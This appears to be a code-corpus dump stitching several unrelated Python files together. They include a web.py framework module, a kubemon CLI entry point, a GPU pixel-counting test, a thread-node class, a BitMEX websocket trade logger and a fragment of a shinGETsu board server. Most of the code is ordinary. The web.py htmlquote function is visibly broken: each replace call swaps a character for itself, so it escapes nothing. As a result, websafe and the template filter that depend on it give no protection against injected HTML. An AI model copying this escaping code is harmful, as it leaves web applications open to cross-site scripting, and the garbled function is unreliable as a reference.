[line.strip('\n') for line in source[lineno + 1:upper_bound]]
return lower_bound, pre_context, context_line, post_context
except (OSError, IOError):
return None, [], None, []
exception_type, exception_value, tback = sys.exc_info()
frames = []
while tback is not None:
filename = tback.tb_frame.f_code.co_filename
function = tback.tb_frame.f_code.co_name
lineno = tback.tb_lineno - 1
pre_context_lineno, pre_context, context_line, post_context = \
_get_lines_from_file(filename, lineno, 7)
frames.append({
'tback': tback,
'filename': filename,
'function': function,
'lineno': lineno,
'vars': tback.tb_frame.f_locals.items(),
'id': id(tback),
'pre_context': pre_context,
'context_line': context_line,
'post_context': post_context,
'pre_context_lineno': pre_context_lineno,
})
tback = tback.tb_next
lastframe = frames[-1]
frames.reverse()
urljoin = urlparse.urljoin
input_ = input()
cookies_ = cookies()
context_ = ctx
def prettify(x):
try:
out = pprint.pformat(x)
except Exception, e:
out = '[could not display: <' + e.__class__.__name__ + \
': '+str(e)+'>]'
return out
return render(DJANGO_500_PAGE, asTemplate=True, isString=True)
def debugerror():
"""
A replacement for `internalerror` that presents a nice page with lots
of debug information for the programmer.
(Based on the beautiful 500 page from [Django](http://djangoproject.com/),
designed by [Wilson Miner](http://wilsonminer.com/).)
Requires [Cheetah](http://cheetahtemplate.org/).
"""
# need to do django first, so it can get the old stuff
if _hasTemplating:
out = str(djangoerror())
else:
# Cheetah isn't installed
out = """<p>You've set web.py to use the fancier debugerror error
messages, but these messages require you install the Cheetah template
system. For more information, see
<a href="http://webpy.org/">the web.py website</a>.</p>
<p>In the meantime, here's a plain old error message:</p>
<pre>%s</pre>
<p>(If it says something about 'Compiler', then it's probably
because you're trying to use templates and you haven't
installed Cheetah. See above.)</p>
""" % htmlquote(traceback.format_exc())
ctx.status = "500 Internal Server Error"
ctx.headers = [('Content-Type', 'text/html')]
ctx.output = out
## Rendering
r_include = re_compile(r'(?!\\)#include \"(.*?)\"($|#)', re.M)
def __compiletemplate(template, base=None, isString=False):
if isString:
text = template
else:
text = open('templates/'+template).read()
# implement #include at compile-time
def do_include(match):
text = open('templates/'+match.groups()[0]).read()
return text
while r_include.findall(text):
text = r_include.sub(do_include, text)
execspace = _compiletemplate.bases.copy()
tmpl_compiler = Compiler(source=text, mainClassName='GenTemplate')
tmpl_compiler.addImportedVarNames(execspace.keys())
exec str(tmpl_compiler) in execspace
if base:
_compiletemplate.bases[base] = execspace['GenTemplate']
return execspace['GenTemplate']
_compiletemplate = memoize(__compiletemplate)
_compiletemplate.bases = {}
def htmlquote(text):
"""Encodes `text` for raw use in HTML."""
text = text.replace("&", "&") # Must be done first!
text = text.replace("<", "<")
text = text.replace(">", ">")
text = text.replace("'", "'")
text = text.replace('"', """)
return text
def websafe(val):
"""
Converts `val` so that it's safe for use in HTML.
HTML metacharacters are encoded,
None becomes the empty string, and
unicode is converted to UTF-8.
"""
if val is None: return ''
if not isinstance(val, unicode): val = str(val)
return htmlquote(val)
if _hasTemplating:
class WebSafe(Filter):
def filter(self, val, **keywords):
return websafe(val)
def render(template, terms=None, asTemplate=False, base=None,
isString=False):
"""
Renders a template, caching where it can.
`template` is the name of a file containing the a template in
the `templates/` folder, unless `isString`, in which case it's the
template itself.
`terms` is a dictionary used to fill the template. If it's None, then
the caller's local variables are used instead, plus context, if it's not
already set, is set to `context`.
If asTemplate is False, it `output`s the template directly. Otherwise,
it returns the template object.
If the template is a potential base template (that is, something other templates)
can extend, then base should be a string with the name of the template. The
template will be cached and made available for future calls to `render`.
Requires [Cheetah](http://cheetahtemplate.org/).
"""
# terms=['var1', 'var2'] means grab those variables
if isinstance(terms, list):
new = {}
old = upvars()
for k in terms:
new[k] = old[k]
terms = new
# default: grab all locals
elif terms is None:
terms = {'context': context, 'ctx':ctx}
terms.update(sys._getframe(1).f_locals)
# terms=d means use d as the searchList
if not isinstance(terms, tuple):
terms = (terms,)
if not isString and template.endswith('.html'):
header('Content-Type','text/html; charset=utf-8', unique=True)
compiled_tmpl = _compiletemplate(template, base=base, isString=isString)
compiled_tmpl = compiled_tmpl(searchList=terms, filter=WebSafe)
if asTemplate:
return compiled_tmpl
else:
return output(str(compiled_tmpl))
## Input Forms
def input(*requireds, **defaults):
"""
Returns a `storage` object with the GET and POST arguments.
See `storify` for how `requireds` and `defaults` work.
"""
from cStringIO import StringIO
def dictify(fs): return dict([(k, fs[k]) for k in fs.keys()])
_method = defaults.pop('_method', 'both')
e = ctx.env.copy()
out = {}
if _method.lower() in ['both', 'post']:
a = {}
if e['REQUEST_METHOD'] == 'POST':
a = cgi.FieldStorage(fp = StringIO(data()), environ=e,
keep_blank_values=1)
a = dictify(a)
out = dictadd(out, a)
if _method.lower() in ['both', 'get']:
e['REQUEST_METHOD'] = 'GET'
a = dictify(cgi.FieldStorage(environ=e, keep_blank_values=1))
out = dictadd(out, a)
try:
return storify(out, *requireds, **defaults)
except KeyError:
badrequest()
raise StopIteration
def data():
"""Returns the data sent with the request."""
if 'data' not in ctx:
cl = intget(ctx.env.get('CONTENT_LENGTH'), 0)
ctx.data = ctx.env['wsgi.input'].read(cl)
return ctx.data
def changequery(**kw):
"""
Imagine you're at `/foo?a=1&b=2`. Then `changequery(a=3)` will return
`/foo?a=3&b=2` -- the same URL but with the arguments you requested
changed.
"""
query = input(_method='get')
for k, v in kw.iteritems():
if v is None:
query.pop(k, None)
else:
query[k] = v
out = ctx.path
if query:
out += '?' + urllib.urlencode(query)
return out
## Cookies
def setcookie(name, value, expires="", domain=None):
"""Sets a cookie."""
if expires < 0:
expires = -1000000000
kargs = {'expires': expires, 'path':'/'}
if domain:
kargs['domain'] = domain
# @@ should we limit cookies to a different path?
cookie = Cookie.SimpleCookie()
cookie[name] = value
for key, val in kargs.iteritems():
cookie[name][key] = val
header('Set-Cookie', cookie.items()[0][1].OutputString())
def cookies(*requireds, **defaults):
"""
Returns a `storage` object with all the cookies in it.
See `storify` for how `requireds` and `defaults` work.
"""
cookie = Cookie.SimpleCookie()
cookie.load(ctx.env.get('HTTP_COOKIE', ''))
try:
return storify(cookie, *requireds, **defaults)
except KeyError:
badrequest()
raise StopIteration
## WSGI Sugar
def header(hdr, value, unique=False):
"""
Adds the header `hdr: value` with the response.
If `unique` is True and a header with that name already exists,
it doesn't add a new one. If `unique` is None and a header with
that name already exists, it replaces it with this one.
"""
if unique is True:
for h, v in ctx.headers:
if h == hdr: return
elif unique is None:
ctx.headers = [h for h in ctx.headers if h[0] != hdr]
ctx.headers.append((hdr, value))
def output(string_):
"""Appends `string_` to the response."""
if isinstance(string_, unicode): string_ = string_.encode('utf8')
if ctx.get('flush'):
ctx._write(string_)
else:
ctx.output += str(string_)
def flush():
ctx.flush = True
return flush
def write(cgi_response):
"""
Converts a standard CGI-style string response into `header` and
`output` calls.
"""
cgi_response = str(cgi_response)
cgi_response.replace('\r\n', '\n')
head, body = cgi_response.split('\n\n', 1)
lines = head.split('\n')
for line in lines:
if line.isspace():
continue
hdr, value = line.split(":", 1)
value = value.strip()
if hdr.lower() == "status":
ctx.status = value
else:
header(hdr, value)
output(body)
def webpyfunc(inp, fvars=None, autoreload=False):
"""If `inp` is a url mapping, returns a function that calls handle."""
if not fvars:
fvars = upvars()
if not hasattr(inp, '__call__'):
if autoreload:
# black magic to make autoreload work:
mod = \
__import__(
fvars['__file__'].split(os.path.sep).pop().split('.')[0])
#@@probably should replace this with some inspect magic
name = dictfind(fvars, inp)
func = lambda: handle(getattr(mod, name), mod)
else:
func = lambda: handle(inp, fvars)
else:
func = inp
return func
def wsgifunc(func, *middleware):
"""Returns a WSGI-compatible function from a webpy-function."""
middleware = list(middleware)
if reloader in middleware:
relr = reloader(None)
relrcheck = relr.check
middleware.remove(reloader)
else:
relr = None
relrcheck = lambda: None
def wsgifunc(env, start_resp):
_load(env)
relrcheck()
try:
result = func()
except StopIteration:
result = None
is_generator = result and hasattr(result, 'next')
if is_generator:
# wsgi requires the headers first
# so we need to do an iteration
# and save the result for later
try:
firstchunk = result.next()
except StopIteration:
firstchunk = ''
status, headers, output = ctx.status, ctx.headers, ctx.output
ctx._write = start_resp(status, headers)
# and now, the fun:
def cleanup():
# we insert this little generator
# at the end of our itertools.chain
# so that it unloads the request
# when everything else is done
yield '' # force it to be a generator
_unload()
# result is the output of calling the webpy function
# it could be a generator...
if is_generator:
if firstchunk is flush:
# oh, it's just our special flush mode
# ctx._write is set up, so just continue execution
try:
result.next()
except StopIteration:
pass
_unload()
return []
else:
return itertools.chain([firstchunk], result, cleanup())
# ... but it's usually just None
#
# output is the stuff in ctx.output
# it's usually a string...
if isinstance(output, str): #@@ other stringlikes?
_unload()
return [output]
# it could be a generator...
elif hasattr(output, 'next'):
return itertools.chain(output, cleanup())
else:
_unload()
raise Exception, "Invalid web.ctx.output"
for mw_func in middleware:
wsgifunc = mw_func(wsgifunc)
if relr:
relr.func = wsgifunc
return wsgifunc
return wsgifunc
def run(inp, *middleware):
"""
Starts handling requests. If called in a CGI or FastCGI context, it will follow
that protocol. If called from the command line, it will start an HTTP
server on the port named in the first command line argument, or, if there
is no argument, on port 8080.
`input` is a callable, then it's called with no arguments.
Otherwise, it's a `mapping` object to be passed to `handle(...)`.
**Caveat:** So that `reloader` will work correctly, input has to be a variable,
it can't be a tuple passed in directly.
`middleware` is a list of WSGI middleware which is applied to the resulting WSGI
function.
"""
autoreload = reloader in middleware
fvars = upvars()
return runwsgi(wsgifunc(webpyfunc(inp, fvars, autoreload), *middleware))
def runwsgi(func):
"""
Runs a WSGI-compatible function using FCGI, SCGI, or a simple web server,
as appropriate.
"""
#@@ improve detection
if os.environ.has_key('SERVER_SOFTWARE'): # cgi
os.environ['FCGI_FORCE_CGI'] = 'Y'
if (os.environ.has_key('PHP_FCGI_CHILDREN') #lighttpd fastcgi
or os.environ.has_key('SERVER_SOFTWARE')
or 'fcgi' in sys.argv or 'fastcgi' in sys.argv):
return runfcgi(func)
if 'scgi' in sys.argv:
return runscgi(func)
# command line:
return runsimple(func, validip(listget(sys.argv, 1, '')))
def runsimple(func, server_address=("0.0.0.0", 8080)):
"""
Runs a simple HTTP server hosting WSGI app `func`. The directory `static/`
is hosted statically.
Based on [WsgiServer][ws] from [Colin Stewart][cs].
[ws]: http://www.owlfish.com/software/wsgiutils/documentation/wsgi-server-api.html
[cs]: http://www.owlfish.com/
"""
# Copyright (c) 2004 Colin Stewart (http://www.owlfish.com/)
# Modified somewhat for simplicity
# Used under the modified BSD license:
# http://www.xfree86.org/3.3.6/COPYRIGHT2.html#5
import SimpleHTTPServer, SocketServer, BaseHTTPServer, urlparse
import socket, errno
import traceback
class WSGIHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def run_wsgi_app(self):
protocol, host, path, parameters, query, fragment = \
urlparse.urlparse('http://dummyhost%s' % self.path)
# we only use path, query
env = {'wsgi.version': (1, 0)
,'wsgi.url_scheme': 'http'
,'wsgi.input': self.rfile
,'wsgi.errors': sys.stderr
,'wsgi.multithread': 1
,'wsgi.multiprocess': 0
,'wsgi.run_once': 0
,'REQUEST_METHOD': self.command
,'REQUEST_URI': self.path
,'PATH_INFO': path
,'QUERY_STRING': query
,'CONTENT_TYPE': self.headers.get('Content-Type', '')
,'CONTENT_LENGTH': self.headers.get('Content-Length', '')
,'REMOTE_ADDR': self.client_address[0]
,'SERVER_NAME': self.server.server_address[0]
,'SERVER_PORT': str(self.server.server_address[1])
,'SERVER_PROTOCOL': self.request_version
}
for http_header, http_value in self.headers.items():
env ['HTTP_%s' % http_header.replace('-', '_').upper()] = \
http_value
# Setup the state
self.wsgi_sent_headers = 0
self.wsgi_headers = []
try:
# We have there environment, now invoke the application
result = self.server.app(env, self.wsgi_start_response)
try:
try:
for data in result:
if data:
self.wsgi_write_data(data)
finally:
if hasattr(result, 'close'):
result.close()
except socket.error, socket_err:
# Catch common network errors and suppress them
if (socket_err.args[0] in \
(errno.ECONNABORTED, errno.EPIPE)):
return
except socket.timeout, socket_timeout:
return
except:
print >> debug, traceback.format_exc(),
internalerror()
if not self.wsgi_sent_headers:
self.wsgi_start_response(ctx.status, ctx.headers)
self.wsgi_write_data(ctx.output)
if (not self.wsgi_sent_headers):
# We must write out something!
self.wsgi_write_data(" ")
return
do_POST = run_wsgi_app
do_PUT = run_wsgi_app
do_DELETE = run_wsgi_app
def do_GET(self):
if self.path.startswith('/static/'):
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
else:
self.run_wsgi_app()
def wsgi_start_response(self, response_status, response_headers,
exc_info=None):
if (self.wsgi_sent_headers):
raise Exception \
("Headers already sent and start_response called again!")
# Should really take a copy to avoid changes in the application....
self.wsgi_headers = (response_status, response_headers)
return self.wsgi_write_data
def wsgi_write_data(self, data):
if (not self.wsgi_sent_headers):
status, headers = self.wsgi_headers
# Need to send header prior to data
status_code = status [:status.find(' ')]
status_msg = status [status.find(' ') + 1:]
self.send_response(int(status_code), status_msg)
for header, value in headers:
self.send_header(header, value)
self.end_headers()
self.wsgi_sent_headers = 1
# Send the data
self.wfile.write(data)
class WSGIServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
def __init__(self, func, server_address):
BaseHTTPServer.HTTPServer.__init__(self,
server_address,
WSGIHandler)
self.app = func
self.serverShuttingDown = 0
print "Launching server: http://%s:%d/" % server_address
WSGIServer(func, server_address).serve_forever()
def makeserver(wsgi_server):
"""Updates a flup-style WSGIServer with web.py-style error support."""
class MyServer(wsgi_server):
def error(self, req):
w = req.stdout.write
internalerror()
w('Status: ' + ctx.status + '\r\n')
for (h, v) in ctx.headers:
w(h + ': ' + v + '\r\n')
w('\r\n' + ctx.output)
return MyServer
def runfcgi(func):
"""Runs a WSGI-function with a FastCGI server."""
from flup.server.fcgi import WSGIServer
if len(sys.argv) > 2: # progname, scgi
args = sys.argv[:]
if 'fastcgi' in args: args.remove('fastcgi')
elif 'fcgi' in args: args.remove('fcgi')
hostport = validaddr(args[1])
elif len(sys.argv) > 1:
hostport = ('localhost', 8000)
else:
hostport = None
return makeserver(WSGIServer)(func, multiplexed=True, bindAddress=hostport).run()
def runscgi(func):
"""Runs a WSGI-function with an SCGI server."""
from flup.server.scgi import WSGIServer
my_server = makeserver(WSGIServer)
if len(sys.argv) > 2: # progname, scgi
args = sys.argv[:]
args.remove('scgi')
hostport = validaddr(args[1])
else:
hostport = ('localhost', 4000)
return my_server(func, bindAddress=hostport).run()
## Debugging
def debug(*args):
"""
Prints a prettyprinted version of `args` to stderr.
"""
try:
out = ctx.environ['wsgi.errors']
except:
out = sys.stderr
for arg in args:
print >> out, pprint.pformat(arg)
return ''
def debugwrite(x):
"""writes debug data to error stream"""
try:
out = ctx.environ['wsgi.errors']
except:
out = sys.stderr
out.write(x)
debug.write = debugwrite
class Reloader:
"""
Before every request, checks to see if any loaded modules have changed on
disk and, if so, reloads them.
"""
def __init__(self, func):
self.func = func
self.mtimes = {}
global _compiletemplate
b = _compiletemplate.bases
_compiletemplate = globals()['__compiletemplate']
_compiletemplate.bases = b
def check(self):
for mod in sys.modules.values():
try:
mtime = os.stat(mod.__file__).st_mtime
except (AttributeError, OSError, IOError):
continue
if mod.__file__.endswith('.pyc') and \
os.path.exists(mod.__file__[:-1]):
mtime = max(os.stat(mod.__file__[:-1]).st_mtime, mtime)
if mod not in self.mtimes:
self.mtimes[mod] = mtime
elif self.mtimes[mod] < mtime:
try:
reload(mod)
except ImportError:
pass
return True
def __call__(self, e, o):
self.check()
return self.func(e, o)
reloader = Reloader
def profiler(app):
"""Outputs basic profiling information at the bottom of each response."""
def profile_internal(e, o):
out, result = profile(app)(e, o)
return out + ['<pre>' + result + '</pre>'] #@@encode
return profile_internal
## Context
class _outputter:
"""Wraps `sys.stdout` so that print statements go into the response."""
def write(self, string_):
if hasattr(ctx, 'output'):
return output(string_)
else:
_oldstdout.write(string_)
def flush(self):
return _oldstdout.flush()
def close(self):
return _oldstdout.close()
_context = {currentThread():Storage()}
ctx = context = threadeddict(_context)
ctx.__doc__ = """
A `storage` object containing various information about the request:
`environ` (aka `env`)
: A dictionary containing the standard WSGI environment variables.
`host`
: The domain (`Host` header) requested by the user.
`home`
: The base path for the application.
`ip`
: The IP address of the requester.
`method`
: The HTTP method used.
`path`
: The path request.
`fullpath`
: The full path requested, including query arguments.
### Response Data
`status` (default: "200 OK")
: The status code to be used in the response.
`headers`
: A list of 2-tuples to be used in the response.
`output`
: A string to be used as the response.
"""
if not '_oldstdout' in globals():
_oldstdout = sys.stdout
sys.stdout = _outputter()
loadhooks = {}
def load():
"""
Loads a new context for the thread.
You can ask for a function to be run at loadtime by
adding it to the dictionary `loadhooks`.
"""
_context[currentThread()] = Storage()
ctx.status = '200 OK'
ctx.headers = []
if 'db_parameters' in globals():
connect(**db_parameters)
for x in loadhooks.values(): x()
def _load(env):
load()
ctx.output = ''
ctx.environ = ctx.env = env
ctx.host = env.get('HTTP_HOST')
ctx.home = 'http://' + env.get('HTTP_HOST', '[unknown]') + \
os.environ.get('REAL_SCRIPT_NAME', env.get('SCRIPT_NAME', ''))
ctx.ip = env.get('REMOTE_ADDR')
ctx.method = env.get('REQUEST_METHOD')
ctx.path = env.get('PATH_INFO')
# http://trac.lighttpd.net/trac/ticket/406 requires:
if env.get('SERVER_SOFTWARE', '').startswith('lighttpd/'):
ctx.path = lstrips(env.get('REQUEST_URI').split('?')[0],
os.environ.get('REAL_SCRIPT_NAME', env.get('SCRIPT_NAME', '')))
ctx.fullpath = ctx.path
if env.get('QUERY_STRING'):
ctx.fullpath += '?' + env.get('QUERY_STRING', '')
unloadhooks = {}
def unload():
"""
Unloads the context for the thread.
You can ask for a function to be run at loadtime by
adding it ot the dictionary `unloadhooks`.
"""
for x in unloadhooks.values(): x()
# ensures db cursors and such are GCed promptly
del _context[currentThread()]
def _unload():
unload()
if __name__ == "__main__":
import doctest
doctest.testmod()
urls = ('/web.py', 'source')
class source:
def GET(self):
header('Content-Type', 'text/python')
print open(sys.argv[0]).read()
run(urls)
|
__main__.py
|
from kubemon.log import create_logger
from .exceptions.platform_exception import NotLinuxException
from .cli import *
from .merge import merge
from .collector.commands import COMMANDS
from multiprocessing import Process
import sys
import logging
def start(instance):
instance.start()
if __name__ == "__main__":
if 'win' in sys.platform:
raise NotLinuxException("Kubemon is only available for Linux-based Operating Systems. Sorry.")
LOGGER = create_logger(__name__, level=logging.DEBUG)
if args.type == 'merge':
if not args.files:
print("Merge type requires --file/-f")
else:
merge(*args.files)
if args.type in MODULES:
LOGGER.debug(f"Starting application {args.type}")
get_system(args.type, args).start()
if args.type == 'cli' and args.command:
LOGGER.debug("Executed CLI")
get_system(args.type, args).exec(args.command)
if args.type == 'all':
LOGGER.debug("Starting application with all monitors")
for s in MODULES[1:]:
s = get_system(s, args)
Process(target=start, args=(s,)).start()
if args.list:
print("Available modules:")
LOGGER.debug("Listing modules")
for module in MODULES:
print(f"\t- {module.capitalize()}")
if args.list_commands:
print("Available commands:")
LOGGER.debug("Listing commands")
for cmd in COMMANDS:
print(f"- {COMMANDS[cmd]}")
|
example2_test_white_percentage.py
|
#
# For this is how God loved the world:<br/>
# he gave his only Son, so that everyone<br/>
# who believes in him may not perish<br/>
# but may have eternal life.
#
# John 3:16
#
from aRibeiro.tools import SensorVis;
import time
from threading import Thread
from multiprocessing import Value
import random
WINDOW_WIDTH = 800
WINDOW_HEIGHT = 800
VIRTUAL_IMAGE_WIDTH = 1920
VIRTUAL_IMAGE_HEIGHT = 1080
VIRTUAL_IMAGE_LINE_WIDTH = 1.0
sensorVis = SensorVis(
WINDOW_WIDTH,WINDOW_HEIGHT,
VIRTUAL_IMAGE_WIDTH,VIRTUAL_IMAGE_HEIGHT,
VIRTUAL_IMAGE_LINE_WIDTH
)
terminateFlag = Value("i", 0)
def AnotherThreadLineDrawer(terminateFlag:Value, sensorVis:SensorVis):
while not terminateFlag.value:
random_start_sec = 0.03
random_end_sec = 0.07
time.sleep( random.random() * (random_end_sec-random_start_sec) + random_start_sec )
random_v_count = random.randint(10, 200)
sensorVis.virtual_image.clear([0,0,0,1])
for i in range(random_v_count):
v1 = [random.random()*sensorVis.map_width,random.random()*sensorVis.map_height,0]
v2 = [random.random()*sensorVis.map_width,random.random()*sensorVis.map_height,0]
sensorVis.virtual_image.lineRenderer.addLine(
v1, # vertex A
v2, # vertex B
[1,1,1,1], #color a
[1,1,1,1] #color b
)
# test query the white percent
gpu_start = time.time()
gpu_value = sensorVis.virtual_image.computeColorPercentage([1,1,1])
gpu_end = time.time()
print("GPU -> value:",gpu_value,"time:", gpu_end-gpu_start, "s")
thread = Thread( target=AnotherThreadLineDrawer, args=[terminateFlag, sensorVis] )
thread.start()
while not sensorVis.windowClosed():
sensorVis.update()
terminateFlag.value = 1
while thread.is_alive():
sensorVis.update()
print("window closed...")
print("gpu processing...")
gpu_start = time.time()
gpu_value = sensorVis.virtual_image.computeColorPercentage([1,1,1])
gpu_end = time.time()
print("GPU -> value:",gpu_value,"time:", gpu_end-gpu_start, "s")
print("cpu processing...")
cpu_start = time.time()
rgb = sensorVis.virtual_image.readImageRGB()
count = 0
for col in rgb:
for row in col:
if row[0] > 200:
count += 1
cpu_value = count/(VIRTUAL_IMAGE_WIDTH*VIRTUAL_IMAGE_HEIGHT)
cpu_end = time.time()
print("CPU -> value:",cpu_value,"time:", cpu_end-cpu_start, "s")
sensorVis.finish()
thread.join()
|
onethreadnode.py
|
# Copyright © 2018 CNRS
# All rights reserved.
# @author Christophe Reymann
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function, division, absolute_import
from threading import Thread, Event
class OneThreadNode():
def __init__(self, node, *args, **kwargs):
self.node = node
#import needed node setup methods
self.send = self.node.send
self.send_callback = self.node.send_callback
self.push_callback = self.node.push_callback
self.time_callback = self.node.time_callback
self.setup_inflow = self.node.setup_inflow
self.setup_outflow = self.node.setup_outflow
self.setup_sink = self.node.setup_sink
self.stop_event = Event()
self.worker = Thread(name=self.name, target=self, daemon=True)
if "callback" in kwargs:
cb = kwargs["callback"]
self.process = cb
if "init" in kwargs:
init = kwargs["init"]
self.init = init
@property
def name(self):
return self.node.name
@property
def dt(self):
return self.node.dt
@property
def time(self):
return self.node.time
def start(self):
self.worker.start()
def stop(self):
self.stop_event.set()
def join(self, timeout=0):
return self.worker.join(timeout)
def isAlive(self):
return self.worker.isAlive()
def __call__(self):
self.node.init()
self.init()
while not self.stop_event.is_set():
t = self.node.next()
if t is not None:
self.node.step(t)
def init(self):
raise NotImplementedError("Please implement process method in your subclass")
|
tradestream_110720.py
|
import datetime
import json
import os
import threading
import traceback
import time
import loghandler
from pymongo import MongoClient
import websocket
import subprocess
# from pprint import pprint
from google.cloud import translate_v2
import six
from dotenv import load_dotenv
load_dotenv(os.path.join(os.getcwd(), ".env"))
class ChatTranslator:
def __init__(self):
self.translate_client = translate_v2.Client()
def translate(self, text, target_language="en"):
pass
class BitmexStream:
def __init__(
self,
mongo_host="localhost",
mongo_port=27017,
mongo_db="bitmex",
translate_chat=True,
):
log_handler = loghandler.LogHandler()
self.logger = log_handler.create_logger("bitmexstream")
self.db = MongoClient(host=mongo_host, port=mongo_port)[mongo_db]
if translate_chat:
self.ct = ChatTranslator()
self.exited = False
def connect(self):
"""Connect to the websocket in a thread."""
self.logger.debug("Starting thread")
self.ws = websocket.WebSocketApp(
"wss://www.bitmex.com/realtime",
on_message=self.on_message,
on_close=self.on_close,
on_open=self.on_open,
on_error=self.on_error,
)
self.wst = threading.Thread(target=lambda: self.ws.run_forever())
self.wst.daemon = True
self.wst.start()
self.logger.debug("Started thread.")
# Wait for connect before continuing
conn_timeout = 5
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout:
time.sleep(1)
conn_timeout -= 1
if not conn_timeout:
self.logger.error("Couldn't connect to websocket! Exiting.")
self.exit()
raise websocket.WebSocketTimeoutException(
"Couldn't connect to websocket! Exiting."
)
def subscribe(self, channels):
self.send_command(command="subscribe", args=channels)
def unsubscribe(self, channels):
self.send_command(command="unsubscribe", args=channels)
def send_command(self, command, args=None):
"""Send a raw command."""
if args is None:
args = []
self.ws.send(json.dumps({"op": command, "args": args}))
def on_message(self, message):
"""Handler for parsing WS messages."""
message = json.loads(message)
# pprint(message)
if message["table"] == "chat":
dt_name = "date"
else:
dt_name = "timestamp"
try:
if "data" in message and message["data"]: # and message["data"]:
for idx, single_trade in enumerate(message["data"]):
message["data"][idx][dt_name] = datetime.datetime.fromisoformat(
single_trade[dt_name].rstrip("Z")
)
if message["table"] == "chat":
self.logger.debug(
f"Chat Message: {message['data'][0]['user']} => {message['data'][0]['message']}"
)
else:
# insert_result = self.db[message["data"][0]["symbol"]].insert_many(
# message["data"]
# )
insert_result = self.db[message["table"]].insert_many(
message["data"]
)
if message["table"] == "trade":
self.logger.debug(
f"Trade Count: {len(insert_result.inserted_ids)}, {message['data'][0]['symbol']} => {message['data'][0]['side'].upper()} {message['data'][0]['size']} @ {message['data'][0]['price']}"
)
elif message["table"] == "instrument":
self.logger.debug(
f"Table: {message['table']}, {message['data'][0]['symbol']}"
)
else:
if dt_name in message:
message[dt_name] = datetime.datetime.fromisoformat(
message[dt_name].rstrip("Z")
)
insert_result = self.db["status"].insert_one(message)
self.logger.debug(f"Status ID: {insert_result.inserted_id}")
except:
self.logger.error(traceback.format_exc())
def chat_handler(self, message):
pass
def on_error(self, error):
"""Called on fatal websocket errors. We exit on these."""
if not self.exited:
self.logger.error("Error : %s" % error)
raise websocket.WebSocketException(error)
def on_open(self):
"""Called when the WS opens."""
self.logger.debug("Websocket opened.")
def on_close(self):
"""Called on websocket close."""
self.logger.info("Websocket closed.")
def exit(self):
"""Call this to exit - will close websocket."""
self.ws.close()
self.exited = True
if __name__ == "__main__":
bitmex_stream = BitmexStream()
bitmex_stream.connect()
bitmex_stream.subscribe(
[
"trade:XBTUSD",
"instrument:XBTUSD",
"trade:ETHUSD",
"instrument:ETHUSD",
"chat",
]
)
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
bitmex_stream.logger.info("Exit signal received.")
bitmex_stream.exit()
break
except Exception as e:
bitmex_stream.logger.exception(e)
time.sleep(5)
|
datd.py
|
"""2ch like dat interface
"""
#
# Copyright (c) 2014,2015 shinGETsu Project.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHORS AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
from wsgiref import simple_server
import threading
import re
from wsgiref.headers import Headers
from email import utils as eutils
import collections
import socketserver
from shingetsu import cache
from shingetsu import title
from shingetsu import config
from shingetsu import gateway
from shingetsu import tag
from . import post
from . import middleware
from . import dat
from . import utils
from . import keylib
board_re= re.compile(r'/([^/]+)/$')
thread_re = re.compile(r'/([^/]+)/dat/([^.]+)\.dat')
subject_re = re.compile(r'/([^/]+)/subject\.txt')
post_comment_re = re.compile(r'/test/bbs\.cgi')
head_re = re.compile(r'/([^/]+)/head\.txt$')
@middleware.simple_range
@middleware.last_modified
@middleware.gzipped
def dat_app(env, resp):
# utils.log('dat_app')
addr = env.get('REMOTE_ADDR', '')
env['shingetsu.isadmin'] = bool(config.re_admin.match(addr))
env['shingetsu.isfriend'] = bool(config.re_friend.match(addr))
env['shingetsu.isvisitor'] = bool(config.re_visitor.match(addr))
